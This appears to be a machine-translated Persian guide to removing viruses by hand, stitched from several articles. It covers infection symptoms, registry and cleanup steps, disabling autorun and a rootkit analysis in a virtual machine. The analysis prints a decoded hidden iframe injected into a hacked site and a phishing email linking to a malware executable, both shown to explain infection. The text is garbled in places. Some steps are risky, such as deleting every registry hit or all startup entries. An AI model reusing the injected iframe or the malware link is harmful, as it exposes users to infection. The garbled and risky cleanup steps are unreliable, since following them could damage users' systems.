چگونه به صورت دستی ویروس را از رایانه پاک کنیم؟ چگونه به صورت دستی ویروس ها را در رایانه خود پیدا کنیم؟ نحوه حذف ویروس ها و سایر بدافزارها از رایانه ویندوزی حذف ویروس از پوشه ویندوز.

بنابراین، امروز با شما در مورد نحوه حذف دستی ویروس از رایانه خود صحبت خواهیم کرد. علاوه بر این، ما به این خواهیم پرداخت که چه تروجان‌هایی را می‌توان یافت، چگونه خود را نشان می‌دهند و در کجا می‌توان آنها را روی رایانه آورد. بیایید به سرعت شروع به مطالعه موضوع امروز خود کنیم.

انواع ویروس ها

خوب، اما قبل از اینکه به صورت دستی یک ویروس را از رایانه خود حذف کنید، ارزش دارد که با شما در مورد نوع عفونتی که به طور کلی در رایانه شما یافت می شود صحبت کنیم. در واقع، در بیشتر موارد، این تعیین می کند که چگونه درمان باید انجام شود. پس بیایید شروع کنیم.

اولین ویروس یک تروجان است. این یک فایل مخرب است که در سیستم عامل "ته نشین می شود" و حتی به آن آسیب می رساند. به عنوان مثال، اسناد مهم را خراب یا از بین می برد. حالا تعدادشان زیاد است.

دومین نوع نسبتا رایج ویروس، انواع باج افزارها هستند. اینها فایل هایی هستند که وارد سیستم می شوند و آن را مسدود می کنند. اما نه با تخریب، بلکه فقط با رمزگذاری اسناد. در پایان چنین رمزی، به عنوان یک قاعده، ایمیل ایجاد کننده باقی می ماند که برای بازگرداندن اسناد به شکل اصلی باید مقدار مشخصی پول به آن منتقل شود.

سومین ویروسی که می توانید پیدا کنید، البته افزونه های مختلف مرورگر یا هرزنامه است. به عنوان یک قاعده، آنها به شدت در کار شما در اینترنت دخالت می کنند. این به دلیل این واقعیت است که صفحه شروع کاربر ممکن است تغییر کند، به علاوه بنرهای تبلیغاتی در همه جای مرورگر قرار خواهند گرفت. وقتی کاربران این تصویر را می بینند، به این فکر می کنند که چگونه ویروس ها را به صورت دستی در رایانه خود پیدا کرده و سپس آنها را حذف کنند. اکنون ما سعی خواهیم کرد این را کشف کنیم.

علائم عفونت

بنابراین، قبل از اینکه ویروس ها را به صورت دستی پیدا کنید و یک بار برای همیشه از شر آنها خلاص شوید، بیایید سعی کنیم بفهمیم چه چیزی ممکن است به شما نشان دهد که یک عفونت کامپیوتری در سیستم وجود دارد. پس از همه، اگر سیگنال ها را به موقع تشخیص دهید، می توانید از آسیب دیدن تعداد زیادی فایل و از دست دادن سیستم عامل جلوگیری کنید.

اولین و واضح ترین علامت چیزی نیست جز پیام هایی از برنامه آنتی ویروس شما. به برخی از اسناد و فایل‌ها فحش می‌دهد و نام ویروس فرضی را به شما می‌دهد. درست است، گاهی اوقات یک آنتی ویروس در رابطه با کرک ها و "تبلت های" مختلف برای بازی های رایانه ای این گونه رفتار می کند. با این حال، این را نمی توان نادیده گرفت.

سناریوی دوم این است که کامپیوتر شما شروع به کند شدن می کند. این زمانی است که کاربران به طور فعال در مورد چگونگی حذف دستی ویروس، به خصوص اگر آنتی ویروس نداشته باشند، فکر می کنند. بنابراین، به محض اینکه متوجه شدید سیستم شما کند شده است، زنگ هشدار را به صدا در آورید.

سناریوی بعدی این است که برنامه های جدیدی که نصب نکرده اید در رایانه شما ظاهر می شوند. یک حرکت نسبتا رایج در میان عفونت های رایانه ای.

علاوه بر این، تبلیغات در مرورگر ممکن است نشان دهنده آلوده بودن رایانه شما باشد. تغییر صفحه شروع بدون امکان بازیابی، بنرهای تبلیغاتی در همه جا - همه اینها سیگنال های کاملاً هشدار دهنده هستند. بنابراین، اجازه دهید به سرعت ببینیم که چگونه به صورت دستی از رایانه کار می کند.

جستجو کردن

خوب، اولین کاری که باید انجام دهید این است که با جستجوی مکان هایی که عفونت در آن قرار دارد شروع کنید. گاهی اوقات انجام این کار بسیار دشوار است. به خصوص اگر برنامه آنتی ویروس ندارید. به طور کلی، بیایید ببینیم در این شرایط چه کاری می توان انجام داد.

بنابراین، هنگامی که تصمیم می گیرید خودتان ویروس را شکست دهید، باید پوشه ای را در رایانه ای که در آن ذخیره شده است پیدا کنید. گاهی اوقات عفونت با ایجاد فرآیندهای خود در Open it (Ctrl + Alt + Del) خود را نشان می دهد، سپس به برگه "processes" بروید. اکنون هر خط مشکوکی را در آنجا پیدا کنید (نام عجیبی خواهد داشت یا حتی با هیروگلیف امضا می شود) و روی دکمه "نمایش مکان فایل" کلیک کنید. انجام شد، ویروس پیدا شد.

درست است، همه چیز همیشه به این آسانی و ساده نیست. اگر به این فکر می کنید که چگونه به صورت دستی یک ویروس را از رایانه خود حذف کنید، باید بدانید که عفونت های رایانه اغلب به خوبی پنهان می شوند. در نمایش پوشه ها، کادر "نمایش و پوشه ها" را علامت بزنید. اکنون جستجو بسیار ساده تر خواهد شد.

همچنین به یاد داشته باشید که اغلب آنها در پوشه ویندوز "قرار می گیرند". به عنوان مثال، بیشتر تروجان ها در System32 یافت می شوند. برخی از عفونت ها می توانند در فایل میزبان "ثبت" شوند. ما مکان های مورد علاقه ویروس ها را می شناسیم. اما چگونه می توان از شر آنها خلاص شد؟

چک ها

اولین سناریو حذف خودکار عفونت است. به طور دقیق تر، نیمه اتوماتیک. ما در مورد بررسی ویروس ها با استفاده از یک برنامه آنتی ویروس صحبت می کنیم.

برای اطمینان از حفاظت از داده های قابل اعتماد، یک آنتی ویروس خوب تهیه کنید. دکتر وب عالیه اگر دوست ندارید، می توانید نود32 را نیز امتحان کنید. او هم کار بسیار خوبی انجام می دهد.

یک بررسی عمیق انجام دهید. پس از اینکه برنامه نتایج را به شما داد، سعی کنید اسناد را به طور خودکار ضد عفونی کنید. نتیجه نداد؟ سپس آنها را پاک کنید. درست است، اگر به این فکر می کنید که چگونه به صورت دستی یک ویروس را از رایانه خود حذف کنید، به احتمال زیاد اسکن آنتی ویروس به شما کمکی نکرده است. بیایید ببینیم چه کارهای دیگری می توان انجام داد.

پاک کردن برنامه ها

قدم دوم برای بهبود سیستم، البته حذف محتوای مختلفی است که ویروس به شما آموزش داده است. این کاملا رایج است. بنابراین، به "کنترل پنل" نگاه کنید و از آنجا به "افزودن یا حذف برنامه ها" بروید. یک لحظه صبر کنید تا محتوای موجود در رایانه شما بررسی کامل شود.

هنگامی که لیست برنامه ها در مقابل شما ظاهر می شود، هر چیزی را که استفاده نمی کنید حذف کنید. به محتوایی که نصب نکرده اید توجه ویژه ای داشته باشید. یا این واقعیت که پس از اتمام نصب برخی دیگر از "برنامه ها" به عنوان یک "تریلر" ظاهر شد. روی خط مورد نظر کلیک راست کرده و سپس دستور “حذف” را انتخاب کنید. آماده؟ سپس می توانید در مورد چگونگی حذف دستی ویروس از رایانه خود بیشتر فکر کنید.

کل اسکن

حال بیایید به برخی از خدمات و تکنیک هایی متوسل شویم که قطعاً به ما کمک خواهند کرد. اگر نام ویروس را می دانید (مخصوصاً اگر با هرزنامه مواجه شدید)، جستجوی عفونت با استفاده از رجیستری رایانه برای شما مناسب است.

برای رفتن به سرویس مورد نیاز، کلیدهای ترکیبی Win + R را فشار دهید و سپس دستور regedit را اجرا کنید. ببینید چه چیزی در مقابل شما ظاهر می شود. در سمت چپ پنجره پوشه هایی با نام های طولانی و نامشخص وجود دارد. در آنهاست که ویروس ها اغلب پنهان می شوند. اما ما کار جستجوی خود را کمی ساده تر خواهیم کرد. فقط به قسمت "ویرایش" بروید و سپس روی "جستجو" کلیک کنید. نام ویروس را تایپ کنید و سپس اسکن را انجام دهید.

پس از دریافت نتایج، تمام خطوط ظاهر شده باید پاک شوند. برای این کار به ترتیب روی هر کدام کلیک کنید و سپس دستور مورد نیاز را انتخاب کنید. همه آماده است؟ سپس کامپیوتر خود را مجددا راه اندازی کنید. اکنون می دانید که چگونه به صورت دستی یک ویروس را از رایانه خود حذف کنید.

در این مقاله به شما خواهم گفت که چگونه کامپیوتر خود را از ویروس ها پاک کنیدبا ضمانت 99٪، زیرا هیچ آنتی ویروس مدرنی نمی تواند 100٪ محافظت کند. اگر نمی خواهید برای مدت طولانی مطالعه کنید یا اشتباه کنید، می توانید ویدیوی ما را در زیر تماشا کنید.

بیایید شروع کنیم، برای اینکه راحت تر بتوانیم ویروس ها را پیدا کنیم و آنها را پاک کنیم، ابتدا باید پوشه های سیستم را تمیز کنیم. این کار دیسک را تخلیه می کند و عملکرد رایانه شما را افزایش می دهد.

دسکتاپ را روشن کنید --> روی دکمه شروع کلیک کنید --> کنترل پنل --> نمادهای کوچک در بالا سمت راست --> گزینه های پوشه --> برگه مشاهده --> نوار لغزنده را به پایین حرکت دهید و علامت: پنهان کردن فایل های سیستم محافظت شده را بردارید. پسوند را برای انواع فایل های ثبت شده مخفی کنید و کادر کنار نمایش فایل ها و پوشه های مخفی را علامت بزنید --> روی اعمال کلیک کنید و سپس OK را بزنید.

بعد به my computer --> drive c (شاید حرف دیگری باشد، به دنبال درایوی با پوشه ویندوز نصب شده بگردیم) --> پوشه windows را باز کرده و سپس در آن Temp کنید، همه فایل ها را با هایلایت یا Ctrl انتخاب کنید. + A و حذف مطلقا هر چیزی که وجود دارد وجود دارد. اگر می گوید که فایل حذف نمی شود، آن را رد کنید.

رایانه من دوباره --> درایو c --> کاربران --> پوشه با نام کاربری شما --> AppData --> Local --> Temp --> دوباره همه فایل ها را انتخاب کنید و آنها را حذف کنید --> به Local برگردید پوشه را حذف کنید و آنها را تا پایین ترین قسمت حذف کنید و همه فایل ها را حذف کنید ( به پوشه ها دست نزنید، مراقب باشید ), به جز آنهایی که پایانی دارند DAT، ini.

CCleaner را دانلود کنید، آن را به زبان روسی (یا هر زبانی که برای شما راحت تر است) نصب کنید، این برنامه را اجرا کنید. دکمه تمیز کردن را فشار دهید (یک جارو کشیده شده است) --> تجزیه و تحلیل، صبر کنید تا 100٪ --> دکمه تمیز کردن را فشار دهید. بعد، روی دکمه رجیستری کلیک کنید --> مشکلات را جستجو کنید، 100% صبر کنید --> رفع کنید --> مراحل آخر را تکرار کنید تا هیچ خطایی پیدا نشود. حالا دکمه سرویس --> به نظر شما همه برنامه های غیر ضروری را حذف کنید( مراقب باش! ، تمام نوار ابزارها و برنامه هایی را که استفاده نمی کنید حذف کنید. دکمه Startup --> می توانید همه چیز را از راه اندازی حذف کنید به جز آنتی ویروس.
malwarebytes anti malware را دانلود کنید، برنامه را در پایان نصب نصب کنید، تیک دوره آزمایشی PRO را بردارید. پس از اولین راه اندازی برنامه، باید یک به روز رسانی انجام دهید؛ منتظر بمانید تا آپدیت کامل شود.در پنجره باز شده، یک نقطه در کنار نوشته Full scan قرار دهید. منتظر بمانید تا کامپیوتر شما از نظر ویروس اسکن شود. اگر ویروس پیدا شد، پس از اسکن باید آنها را حذف کنید. در پنجره ای که با لیستی از ویروس ها ظاهر می شود، همه کادرها را علامت بزنید و روی دکمه Remove gefs کلیک کنید. ممکن است برنامه از شما بخواهد که رایانه خود را مجدداً راه اندازی کنید تا ویروس ها را حذف کنید. راه اندازی مجدد کنید و دوباره شروع به اسکن کنید، اگر ویروس ها دوباره شناسایی شدند، چند اسکن دیگر انجام دهید اما بیشتر از 4 مورد. نصب مجدد ویندوز آسان تر است. اگر توانستید همه تهدیدات را حذف کنید. برای اطمینان بیشتر، می توانید رایانه خود را با آنتی ویروس استاندارد خود اسکن کنید.
پس از انجام تمام این مراحل، در اکثر موارد کامپیوتر شما سریعتر شروع به کار کرده و به طور کامل از ویروس ها پاک می شود. شما هنوز هم می توانید اگر آنتی ویروس کار خود را انجام نداد چه باید کرد؟

    احتمالا بارها و بارها در رسانه ها با اطلاعاتی مواجه شده اید که ویروس وحشتناک جدیدی ظاهر شده است که می تواند منجر به یک اپیدمی وحشتناک جدید و تقریباً پایان اینترنت شود. یا اینکه یک فناوری ویروس نویسی جدید بر اساس استفاده از کمترین بیت های پیکسل در تصاویر گرافیکی ظاهر شده است و تشخیص بدنه ویروس تقریبا غیرممکن است. یا...خیلی چیزای ترسناک دیگه. گاهی اوقات ویروس ها تقریباً هوش و خودآگاهی را منتقل می کنند. این اتفاق می افتد زیرا بسیاری از کاربران، که در طبقه بندی پیچیده و جزئیات مکانیسم عملکرد ویروس ها سردرگم شده اند، فراموش می کنند که اول از همه، هر ویروسی یک برنامه کامپیوتری است، یعنی. مجموعه ای از دستورات (دستورالعمل) پردازنده که به روش خاصی طراحی شده اند. فرقی نمی‌کند که این مجموعه به چه شکلی وجود داشته باشد (یک فایل اجرایی، یک اسکریپت، بخشی از بخش بوت یا گروهی از بخش‌های خارج از سیستم فایل) - بسیار مهم‌تر است که این برنامه نتواند کنترل را به دست آورد، به عنوان مثال. شروع به اجرا کنید ویروسی که روی هارد دیسک شما ضبط شده اما راه اندازی نشده است به اندازه هر فایل دیگری بی ضرر است. وظیفه اصلی در مبارزه با ویروس ها شناسایی بدن ویروس نیست، بلکه جلوگیری از احتمال راه اندازی آن است. بنابراین، تولیدکنندگان واجد شرایط ویروس نه تنها فناوری معرفی نرم‌افزارهای مخرب را به سیستم، بلکه روش‌های راه‌اندازی و عملیات مخفی را نیز بهبود می‌بخشند.

چگونه یک کامپیوتر به بدافزار (ویروس) آلوده می شود؟ پاسخ واضح است - برخی از برنامه ها باید در حال اجرا باشند. در حالت ایده آل - با حقوق اداری، ترجیحا - بدون اطلاع کاربر و بدون توجه او. روش های راه اندازی به طور مداوم در حال بهبود هستند و نه تنها بر اساس فریب مستقیم، بلکه بر اساس ویژگی ها یا کاستی های سیستم عامل یا نرم افزارهای کاربردی است. به عنوان مثال، استفاده از autorun برای رسانه های قابل جابجایی در خانواده سیستم عامل های ویندوز منجر به انتشار ویروس ها در درایوهای فلش شده است. توابع Autorun معمولاً از رسانه‌های قابل جابجایی یا از اشتراک‌گذاری‌های شبکه فراخوانی می‌شوند. در اجرای autorun فایل پردازش می شود Autorun.inf. این فایل تعیین می کند که سیستم چه دستوراتی را اجرا می کند. بسیاری از شرکت ها از این عملکرد برای راه اندازی نصب کننده برای محصولات نرم افزاری خود استفاده می کنند، با این حال، تولید کنندگان ویروس نیز شروع به استفاده از آن کرده اند. در نتیجه، هنگام کار با کامپیوتر، می توانید اتوران را به عنوان یک راحتی فراموش کنید. - اکثر کاربران شایسته این گزینه را برای همیشه غیرفعال کرده اند.

برای غیرفعال کردن عملکردهای autorun در ویندوز XP/2000، فایل reg را به رجیستری وارد کنید.

برای ویندوز 7 و نسخه های جدیدتر، می توانید با استفاده از برنامه AutoPlay در کنترل پنل، AutoPlay را غیرفعال کنید. در این مورد، غیرفعال کردن برای کاربر فعلی اعمال می شود. یک راه مطمئن تر برای محافظت در برابر معرفی ویروس های حمل شده در دستگاه های قابل جابجایی، مسدود کردن اجرای خودکار برای همه کاربران با استفاده از خط مشی های گروه است:

راه اندازی ویرایشگر خط مشی گروه gpedit.msc

به "پیکربندی کامپیوتر" - - "پیکربندی ویندوز" - "الگوهای اداری" - "کامپوننت های ویندوز" - "خط مشی خودکار" بروید.

روی "روشن" تنظیم کنید برای مؤلفه "غیرفعال کردن اتوران"

    اما بدون شک "تامین کننده" اصلی ویروس ها اینترنت و به عنوان نرم افزار کاربردی اصلی، "مرورگر اینترنت" (مرورگر) است. وب سایت ها پیچیده تر و زیباتر می شوند، قابلیت های چند رسانه ای جدید ظاهر می شوند، شبکه های اجتماعی در حال رشد هستند، تعداد سرورها دائما در حال افزایش است و تعداد بازدیدکنندگان آنها در حال افزایش است. مرورگر اینترنت به تدریج به یک بسته نرم افزاری پیچیده تبدیل می شود - مفسر داده های دریافت شده از خارج. به عبارت دیگر، به یک بسته نرم افزاری که برنامه ها را بر اساس محتوای ناشناخته اجرا می کند. توسعه دهندگان مرورگرها به طور مداوم برای بهبود امنیت محصولات خود تلاش می کنند، اما تولید کنندگان ویروس نیز ثابت نمی مانند و احتمال آلوده شدن یک سیستم به بدافزار بسیار زیاد است. این عقیده وجود دارد که اگر از "سایت های بزرگسالان" بازدید نکنید، سایت هایی با شماره سریال محصولات نرم افزاری و غیره. سپس می توانید از عفونت جلوگیری کنید. این کاملا درست نیست. سایت های هک شده زیادی در اینترنت وجود دارد که صاحبان آنها حتی از هک شدن آن ها اطلاعی ندارند. و روزهایی که هکرها غرور خود را با جایگزین کردن صفحات (محرومیت) ارضا می کردند، گذشته است. امروزه معمولاً چنین هکی با وارد کردن کد خاصی به صفحات یک وب سایت کاملاً معتبر برای آلوده کردن رایانه بازدیدکننده همراه است. علاوه بر این، تولیدکنندگان ویروس از محبوب ترین عبارت های جستجو برای نمایش صفحات آلوده در نتایج موتورهای جستجو استفاده می کنند. پرس و جوهایی با عبارات "دانلود رایگان" و "دانلود بدون ثبت نام و پیامک" بسیار محبوب هستند. سعی کنید از این کلمات در جست و جوها استفاده نکنید، در غیر این صورت خطر دریافت لینک به سایت های مخرب به میزان قابل توجهی افزایش می یابد. به خصوص اگر به دنبال فیلم محبوبی هستید که هنوز اکران نشده یا آخرین کنسرت یک گروه معروف.

    سعی می کنم با استفاده از یک مثال مکانیسم آلودگی کامپیوتر بازدیدکنندگان سایت را به صورت ساده توضیح دهم. چندی پیش، هنگام بازدید از یک سایت نسبتاً محبوب، اعلانی از برنامه نظارت بر راه اندازی (PT Startup Monitor) دریافت کردم که برنامه rsvc.exeتلاش برای نوشتن به رجیستری برنامه با موفقیت توسط FAR از بین رفت و تغییرات در رجیستری توسط PT Startup Monitor لغو شد. تجزیه و تحلیل صفحات سایت وجود کدهای عجیب جاوا اسکریپت را نشان داد که عملیات تبدیل داده های رشته ای را انجام می دهد که متن معنی دار نیستند. جاوا اسکریپت توسط اکثر مرورگرهای مدرن پشتیبانی می شود و تقریباً در تمام صفحات وب استفاده می شود. اسکریپت دانلود شده از چنین صفحاتی توسط مرورگر اینترنت اجرا می شود. در نتیجه تبدیل های متعدد خطوط ذکر شده در بالا، یک کد نسبتا ساده به دست آمد:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

به معنای اجرای یک اسکریپت CGI یک سرور با آدرس IP 91.142.64.91 (که ربطی به سایت در حال بازدید ندارد) در یک پنجره جداگانه (برچسب iframe) به اندازه 1 پیکسل در عرض و 1 پیکسل در ارتفاع به صورت نامرئی پنجره نتیجه یک عفونت ویروسی بسیار محتمل است. به خصوص اگر آنتی ویروس وجود نداشته باشد یا به تهدید پاسخ ندهد. این مثال از تغییر مسیر پنهان بازدیدکننده به یک سایت مخرب با استفاده از تگ "iframe" احتمالاً امروزه چندان مرتبط نیست، اما به طور کامل نشان می دهد که چگونه در حین بازدید از یک سایت قانونی، می توانید بدون توجه به سایتی دیگر، نه چندان قانونی، بدون حتی مراجعه کنید. دانستن آن متأسفانه، هیچ تضمینی در برابر عفونت ویروسی وجود ندارد و شما باید برای این واقعیت آماده باشید که باید به تنهایی با ویروس مقابله کنید.

    اخیراً یکی از مسیرهای اصلی در توسعه بدافزارها استفاده از انواع روش ها برای محافظت از آنها در برابر شناسایی توسط ابزارهای آنتی ویروس بوده است - به اصطلاح فناوری rootkit. چنین برنامه هایی اغلب یا توسط برنامه های آنتی ویروس شناسایی نمی شوند یا توسط آنها حذف نمی شوند. در این مقاله سعی می کنم یک تکنیک کم و بیش جهانی برای شناسایی و حذف نرم افزارهای مخرب از یک سیستم آلوده را شرح دهم.

    حذف یک ویروس "با کیفیت بالا" در حال تبدیل شدن به یک کار غیر ضروری است، زیرا توسعه دهندگان چنین ویروسی را با ویژگی هایی ارائه می دهند که راه حل آن را تا حد امکان دشوار می کند. اغلب، یک ویروس می‌تواند در حالت هسته عمل کند و قابلیت‌های نامحدودی برای رهگیری و اصلاح عملکردهای سیستم دارد. به عبارت دیگر، ویروس این توانایی را دارد که فایل ها، کلیدهای رجیستری، اتصالات شبکه را از کاربر (و آنتی ویروس) مخفی کند - همه چیزهایی که ممکن است نشانه ای از حضور آن در سیستم آلوده باشد. این می تواند هر فایروال، سیستم های تشخیص نفوذ و تحلیلگرهای پروتکل را دور بزند. و از جمله موارد دیگر، می تواند در حالت راه اندازی ایمن ویندوز کار کند. به عبارت دیگر، بدافزار مدرن شناسایی و خنثی کردن آن بسیار دشوار است.

    توسعه آنتی ویروس ها نیز ثابت نمی ماند - آنها به طور مداوم در حال بهبود هستند و در بیشتر موارد، آنها قادر به شناسایی و خنثی کردن بدافزار خواهند بود، اما دیر یا زود، تغییری در ویروس ایجاد می شود که بیش از حد خواهد بود. برای هر آنتی ویروسی برای مدتی سخت است. بنابراین، شناسایی و حذف مستقل یک ویروس کاری است که دیر یا زود هر کاربر رایانه مجبور به انجام آن خواهد شد.

سلام.
ما به نامزدی شما علاقه مندیم، اما از شما دعوت می کنیم که آن را تکمیل کنید
فرم رزومه شرکتی ما و ارسال آن به [ایمیل محافظت شده]
پاسخگویی تضمینی نیست، اما اگر رزومه شما به ما علاقه مند باشد، این کار را خواهیم کرد
ما ظرف چند روز با شما تماس خواهیم گرفت. فراموش نکن
شماره تلفن و موقعیتی که برای آن درخواست می کنید را مشخص کنید. ترجیحا
همچنین خواسته های حقوق خود را مشخص کنید.
سربرگ ما را می توانید از لینک زیر دانلود کنید.
http://verano-konwektor.pl/resume.exe

    تجزیه و تحلیل سرصفحه نامه ها نشان داد که از یک کامپیوتر در برزیل از طریق یک سرور واقع در ایالات متحده ارسال شده است. و سربرگ شرکت برای دانلود از سروری در لهستان پیشنهاد می شود. و این با محتوای روسی زبان است.

    واضح است که هیچ سربرگی نخواهید دید و به احتمال زیاد یک برنامه تروجان در رایانه خود دریافت خواهید کرد.
    دانلود فایل resume.exe. حجم - 159744 بایت. من هنوز آن را راه اندازی نمی کنم.
    فایل را در رایانه های دیگری که آنتی ویروس های مختلف نصب شده اند کپی می کنم - فقط برای اینکه دوباره کارایی آنها را بررسی کنم. نتایج چندان داغ نیستند - آنتی ویروس Avast 4.8 Home Edition با ظرافت ساکت ماند. من آن را به سیمانتک تحویل دادم - همان واکنش.
    همه آزمایشات را روی یک ماشین مجازی با سیستم عامل ویندوز XP انجام می دهم. یک حساب با حقوق سرپرست، زیرا اغلب ویروس ها تنها در صورتی با موفقیت وارد سیستم می شوند که کاربر یک مدیر محلی باشد.
    در حال راه اندازی هستم. پس از مدتی، فایل آلوده ناپدید شد، به نظر می رسد که ویروس کار کثیف خود را آغاز کرده است.
    رفتار سیستم به صورت خارجی تغییر نکرده است. بدیهی است که نیاز به راه اندازی مجدد است. در هر صورت، من اتصالات TCP را در فایروال غیرفعال می کنم. من فقط اتصالات خروجی را از طریق UDP:53 (DNS) مجاز می گذارم - باید حداقل فرصتی به ویروس بدهید تا فعالیت خود را نشان دهد. به عنوان یک قاعده، پس از معرفی، ویروس باید با میزبان یا سرور داده شده در اینترنت تماس بگیرد، که نشانه آن درخواست های DNS خواهد بود. اگرچه، دوباره، با توجه به موارد فوق، یک ویروس هوشمند می تواند آنها را پنهان کند، علاوه بر این، می تواند فایروال را دور بزند. با نگاهی به آینده، می گویم که در این مورد خاص این اتفاق نیفتاده است، اما برای تجزیه و تحلیل قابل اعتماد فعالیت شبکه، بهتر است تمام ترافیک یک ماشین آلوده از طریق دستگاهی غیر آلوده منتقل شود، جایی که می توانید مطمئن شوید که فایروال قوانین رعایت می شوند و تحلیلگر ترافیک (من از Wireshark استفاده کردم) آنچه را که واقعاً وجود دارد را نشان می دهد.
    راه اندازی مجدد. از نظر ظاهری، هیچ چیز تغییر نکرده است، به جز اینکه دسترسی به اینترنت غیرممکن است، زیرا من خودم این امکان را غیرفعال کردم. هیچ چیز جدیدی نه در مسیرهای راه اندازی، نه در خدمات و نه در کاتالوگ های سیستم ظاهر نشده است. مشاهده گزارش سیستم تنها یک سرنخ می دهد - سیستم قادر به راه اندازی سرویس مرموز نبود grande48. من نمی توانستم چنین سرویسی داشته باشم و این رویداد با لحظه اجرا مصادف شد. آنچه دیگر اجرای موفقیت آمیز را نشان می دهد، عدم وجود ورودی در مورد سرویس grande48 در رجیستری و عدم وجود پیام دوم در گزارش سیستم در مورد خطای شروع سرویس پس از راه اندازی مجدد است. این به احتمال زیاد نقصی از نویسندگان ویروس است. اگرچه ناچیز است، زیرا اکثر کاربران گزارش رویداد را مشاهده نمی کنند و در زمان مشکوک شدن به عفونت، ممکن است این ورودی در گزارش دیگر وجود نداشته باشد.

ما وجود یک ویروس را در سیستم تعیین می کنیم.

1.     مطمئناً باید ترافیک "چپ" وجود داشته باشد. این را می توان با استفاده از تحلیلگرهای پروتکل تعیین کرد. من از Wireshark استفاده کردم. بلافاصله پس از دانلود، ابتدا آن را راه اندازی می کنم. همه چیز درست است، گروهی از جستارهای DNS وجود دارد (همانطور که بعداً مشخص شد - هر 5 دقیقه یک بار) برای تعیین آدرس IP گره های ysiqiyp.com، irgfqfyu.com، updpqpqr.com و غیره. در واقع، همه سیستم عامل های ویندوز دوست دارند در مواقع ضروری آنلاین شوند و نه، آنتی ویروس ها می توانند پایگاه داده خود را به روز کنند، بنابراین تشخیص ویروس بودن ترافیک بسیار دشوار است. معمولاً باید ترافیک را از طریق یک دستگاه غیر آلوده عبور دهید و محتویات آن را به طور جدی تجزیه و تحلیل کنید. اما این یک موضوع جداگانه است. در اصل، یک نشانه غیرمستقیم غیرعادی در فعالیت شبکه سیستم می تواند مقادیر قابل توجهی در شمارنده های ترافیک ارائه دهنده در زمان خرابی سیستم، شمارنده هایی از ویژگی های اتصال VPN و غیره باشد.

2.     بیایید سعی کنیم از برنامه هایی برای جستجوی روت کیت ها استفاده کنیم. اکنون تعداد زیادی از این برنامه ها وجود دارد و به راحتی در اینترنت پیدا می شوند. یکی از محبوب ترین ها توسط Mark Russinovich است که می توانید آن را از قسمت Windows Sysinternals وب سایت مایکروسافت دانلود کنید. بدون نیاز به نصب از حالت فشرده خارج کنید و راه اندازی کنید. روی "اسکن" کلیک کنید. پس از یک اسکن کوتاه نتایج را مشاهده می کنیم:

    به هر حال، حتی بدون کاوش در محتویات خطوط، بلافاصله می توانید متوجه شوید که رکوردها یا فایل هایی وجود دارند که از نظر زمان ایجاد/تغییر آنها بسیار "جدید" هستند (ستون "مهر زمان"). ما باید در درجه اول به پرونده هایی با توضیحات علاقه مند باشیم (ستون "شرح") - "مخفی از Windows API"- از API ویندوز پنهان شده است. البته پنهان کردن فایل‌ها، ورودی‌های رجیستری، برنامه‌ها طبیعی نیست. دو فایل - grande48.sys و Yoy46.sys - این دقیقا همان چیزی است که ما به دنبال آن هستیم. این روت کیت مورد نظر است که تحت پوشش درایورها ثبت شده یا بخشی از آن است که محرمانه بودن را فراهم می کند. حضور دیگران در لیست برای من غافلگیرکننده بود. بررسی نشان داد که اینها درایورهای معمولی ویندوز XP هستند. علاوه بر این، ویروس حضور خود را فقط در پوشه پنهان کرد \ system32 ، و کپی های آنها در \system32\dllcache قابل مشاهده باقی ماند.
    اجازه دهید به شما یادآوری کنم که ویندوز XP از مکانیزم محافظت از فایل های سیستم خاصی به نام استفاده می کند حفاظت از فایل ویندوز (WFP). هدف WFP بازیابی خودکار فایل های سیستمی مهم در صورت حذف یا جایگزینی با نسخه های قدیمی یا بدون امضا است. تمام فایل های سیستم ویندوز XP به صورت دیجیتال امضا شده و در یک پایگاه داده ویژه مورد استفاده WFP فهرست شده اند. یک پوشه برای ذخیره کپی از فایل ها استفاده می شود \system32\dllcache و تا حدی حافظه پنهان \ویندوز\درایور . هنگامی که یکی از فایل های سیستم را حذف یا جایگزین می کنید، WFP به طور خودکار کپی "صحیح" آن را از پوشه \dllcache کپی می کند. اگر فایل مشخص شده در پوشه \dllcache نباشد، ویندوز XP از شما می خواهد که سی دی نصب ویندوز XP را در درایو سی دی خود قرار دهید. سعی کنید vga.sys را از \system32 حذف کنید، و سیستم بلافاصله آن را با استفاده از یک کپی از dllcache بازیابی می کند. و وضعیتی که با اجرای سیستم بازیابی فایل، فایل درایور در \dllcache است و در \system32 قابل مشاهده نیست - این نیز یک نشانه اضافی از وجود rootkit در سیستم است.

ما ویروس را از سیستم حذف می کنیم.

    مهمترین مرحله باقی مانده حذف ویروس است. ساده ترین و مطمئن ترین راه این است که در یک سیستم عامل دیگر و غیر آلوده بوت کنید و از راه اندازی درایورهای روت کیت جلوگیری کنید.

بیایید از کنسول استاندارد بازیابی ویندوز استفاده کنیم. دیسک نصب ویندوز XP را بردارید و از آن بوت کنید. در صفحه اول، دومین مورد منو را انتخاب کنید - R را فشار دهید.

یک سیستم را انتخاب کنید (در صورت وجود چندین مورد):

رمز عبور مدیر را وارد کنید.
لیست درایورها و خدمات را می توان با استفاده از دستور listsvc مشاهده کرد:

در واقع، لیست شامل سال 46 با این حال، grande48 وجود ندارد، که نشان می‌دهد فایل درایور grande48.sys مخفیانه در سیستم وجود دارد، اما بارگذاری نشده است:

Recovery Console به شما اجازه می دهد تا درایورها و سرویس ها را رد کنید یا اجازه دهید تا از دستورات استفاده کنند غیر فعال کردنو فعال کردن. ما شروع Yoy46 را با این دستور ممنوع می کنیم:

    دستور EXIT را صادر می کنیم و سیستم به راه اندازی مجدد می رود.
پس از راه اندازی مجدد، درایور روت کیت بارگیری نمی شود و به راحتی می توانید فایل های آن را حذف کنید و رجیستری را از ورودی های آن پاک کنید. می توانید این کار را به صورت دستی انجام دهید یا می توانید از نوعی آنتی ویروس استفاده کنید. از نظر من مؤثرترین اسکنر رایگان مبتنی بر آنتی ویروس معروف Dr.Web توسط ایگور دانیلوف است. می توانید آن را از اینجا دانلود کنید - http://freedrweb.ru
